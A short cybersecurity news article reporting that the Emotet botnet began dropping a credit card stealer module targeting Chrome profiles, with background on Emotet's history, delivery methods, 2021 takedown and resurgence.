The Emotet botnet now aims to infect potential targets with a credit card stealer module that harvests credit card data from Google Chrome user profiles. The malware transfers the stolen credit card information (name, expiration month and year, card numbers) to command-and-control (C2) servers other than the ones used by the Emotet card stealer module.
“On June 6th, Proofpoint observed a new #Emotet module being dropped by the E4 botnet,” revealed the Proofpoint Threat Insights team. “To our surprise it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader.”
According to the Cryptolaemus security research group, this behavior shift follows an increase in activity in April and a move to 64-bit modules. Emotet began using Windows shortcut files (.LNK) to run PowerShell commands on victims’ computers a week later, moving away from Microsoft Office macros, which were disabled by default in early April 2022.
In 2014, the Emotet malware was created and used in cyberattacks as a banking trojan. The TA542 threat group (also known as Mummy Spider) employs it to distribute second-stage payloads through a botnet. It also enables its operators to steal user information, conduct surveillance on compromised networks, and migrate laterally to susceptible devices.
Emotet is infamous for dumping the Qbot and Trickbot malware trojan payloads on infected machines, which are then used to install more malware, such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet’s infrastructure was shut down in early 2021 as part of an international law enforcement operation that also resulted in the arrest of two people. On April 25th, 2021, German law enforcement deployed Emotet’s own infrastructure against the botnet, providing a module that removed the virus from compromised devices.
When Emotet research organization Cryptolaemus, computer security firm GData, and cybersecurity company Advanced Intel spotted the TrickBot malware being used to deliver an Emotet loader in November 2021, the botnet resurfaced, employing TrickBot’s previously existing infrastructure. Emotet has witnessed a tremendous spike in activity since the beginning of the year, according to ESET, “with its activity growing more than 100-fold vs T3 2021.”